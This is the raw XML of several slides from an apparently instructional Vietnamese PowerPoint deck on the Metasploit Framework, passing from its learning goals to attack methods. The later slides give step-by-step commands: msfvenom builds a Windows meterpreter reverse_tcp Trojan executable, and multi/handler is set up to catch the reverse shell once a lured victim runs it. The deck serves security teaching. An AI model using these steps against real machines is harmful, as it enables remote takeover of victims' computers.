                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Mục</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="5000" smtClean="0">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="5000" err="1" smtClean="0">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>tiêu</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="500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819150" y="2171700"/>
            <a:ext cx="10553700" cy="3289300"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457200" indent="-457200" algn="l">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3600" err="1" smtClean="0">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Biết</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được</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Metasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" smtClean="0">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> Framework </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" err="1" smtClean="0">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>là</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gì</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" smtClean="0">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200" algn="l">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3600" err="1" smtClean="0">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Sử</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dụng</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được</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Metasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" smtClean="0">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> Framework </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" err="1" smtClean="0">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>cơ</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bản</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" smtClean="0">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200" algn="l">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3600" err="1" smtClean="0">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Hiểu</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được</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một</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số</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phương</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thức</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tấn</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công</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của</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MSF</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và</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cách</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thức</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phòng</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" smtClean="0">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" err="1" smtClean="0">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>chống</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{317AADAE-BEA8-4761-9289-77A15DF9BE95}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>2</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="301251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3046988"/>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a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Sử dụng module để dò quét và tấn công lỗ hổng bảo </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" smtClean="0">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>mật</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" i="1">
              <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" sz="2400" smtClean="0">
              <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Đánh </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>vào lỗ hổng bảo mật phụ thuộc vào việc máy victim có để hổng lỗ nào hay không. Nó có thể là những dịch vụ mạng mà tính bảo mật kém mà máy victim đang chạy. Dĩ nhiên máy victim mà bế quan toả cảng, không mở port nào cả thì ta chẳng thể thâm nhập được từ bên ngoài.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="v"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2400" i="1"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20</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="883695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3970318"/>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a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>T</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" smtClean="0">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>ạo </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>mã độc (Trojan), rồi truyền vào </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" smtClean="0">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>máy </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>victim sau đó dẫn dụ victim kích </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" smtClean="0">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>hoạt</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" smtClean="0">
              <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Bước 1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>: Tạo payload bằng lệnh: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" i="1">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>msfvenom -a x86 --platform windows -f exe -p windows/meterpreter/reverse_tcp lhost=[ip] lport=[cổng] -o [tên_file].exe</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400">
              <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Bước 2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>: Mở một cửa sổ terminal khác, chạy </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" i="1">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>msfconsole</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> để khởi chạy </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Metasploit Framework</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400">
              <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Bước 3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>: Gõ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" i="1">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>use</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" i="1">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>exploit/multi/handler. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="240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sz="2400" i="1"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21</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1042338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3046988"/>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a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>T</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" smtClean="0">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>ạo </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>mã độc (Trojan), rồi truyền vào </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" smtClean="0">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>máy </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>victim sau đó dẫn dụ victim kích </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" smtClean="0">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>hoạt</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" smtClean="0">
              <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Bước 4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>: Gõ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" i="1">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>set payload windows/meterpreter/reverse_tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> thiết lập kiểu payload mà bạn đã chọn để tạo file payload vừa rồi. Đồng thời </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" i="1">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>set</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" i="1">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>lhost</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> và </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" i="1">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>set</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" i="1">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>lport</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> trùng với Trojan ở trên.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Bước 5</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>: Gõ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" i="1">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>exploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
